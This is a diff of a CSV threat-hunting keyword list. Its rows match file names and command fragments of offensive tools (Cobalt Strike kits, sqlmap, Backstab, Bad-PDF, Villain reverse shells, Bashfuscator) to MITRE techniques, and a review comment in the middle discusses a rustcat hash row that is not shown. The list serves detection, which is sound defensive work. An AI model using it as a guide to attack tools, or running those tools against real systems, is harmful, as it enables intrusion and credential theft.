T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Backdoor.*","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*backdoor.asp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*backdoor.aspx*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*backdoor.jsp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*backdoor.php*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - 
T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.asp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.aspx*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.jsp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.php*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*BackdoorableScript*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" 
"*--backdoor-all*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*BackdoorLNK*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*backdoorlnkdialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*BackdoorLNK*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*backdoorlnkdialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*backstab.exe*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Backstab.sln*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense 
Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*backstab.x64.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" 
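Review bot: The one new row in this hunk, `*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*` for rustcat, is an opaque 40-hex-character keyword with `metadata_comment` left as `N/A`, so nothing records which artifact the value identifies or how it was derived. An analyst triaging a hit cannot tell whether it is the hash of a specific release binary or some other identifier, and a maintainer cannot tell when it has gone stale. I would fill the comment column in, for example `"<hash type> of <artifact name>, release <version>"` with the real values. The technique and tactic columns (`T1090.001 - T1090.002 - T1046`, `TA0011 - TA0009 - TA0040`) closely mirror the rsocx proxy row a few lines above and may have been carried over from it. For a port listener and reverse shell they are worth a second look before detections inherit the mapping.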
@@ -7547,7 +7693,7 @@ "*BadgerStrlen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcscmp*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BadgerWcslen*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Bad-Pdf*","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. 
Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","980","213","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" +"*Bad-Pdf*","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","10","981","214","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z" "*BadPotato.cs*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BadPotato.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*badpotato.exe*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","","N/A","","","" 
@@ -7558,32 +7704,32 @@ "*BadUSB_HideWindow.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadUSB_LockYourComputer.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*BadZure-main*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*bananaKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*BaRMIe*","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","7","691","107","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" +"*bananaKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*BaRMIe*","offensive_tool_keyword","BaRMIe","BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services.","T1522 - T1070 - T1573 - T1071","TA0001 - TA0003 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/NickstaDB/BaRMIe","1","0","N/A","N/A","7","692","107","2017-09-28T22:38:02Z","2017-09-24T18:54:12Z" "*baron-samedit-heap-based-overflow-sudo.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs is an utility 
to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*base64_conversion_commands.ps1*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" -"*bash lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*bash lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*bash_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*bash_read_line_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*bash_read_line_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*bashfuscator -*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*Bashfuscator Team*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "*bashfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" 
"*Bashfuscator-master*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" -"*BasicServiceExploit.class*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*BasicServiceExploit.class*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*BastilleResearch*","offensive_tool_keyword","Github Username","Open source testing tools for the SDR & security community","T1179 - T1141 - T1142 - T1143","TA0011 - ","N/A","N/A","Exploitation tools","https://github.com/BastilleResearch","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*--batch --dump -T *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*--batch --dump -T *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*Bates.exe --kill*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*Bates.exe --listen*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed 
.NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*bats3c/ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*bats3c/darkarmour*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" -"*bats3c/DarkLoadLibrary*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","874","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*bats3c/DarkLoadLibrary*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*bats3c/EvtMute*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense 
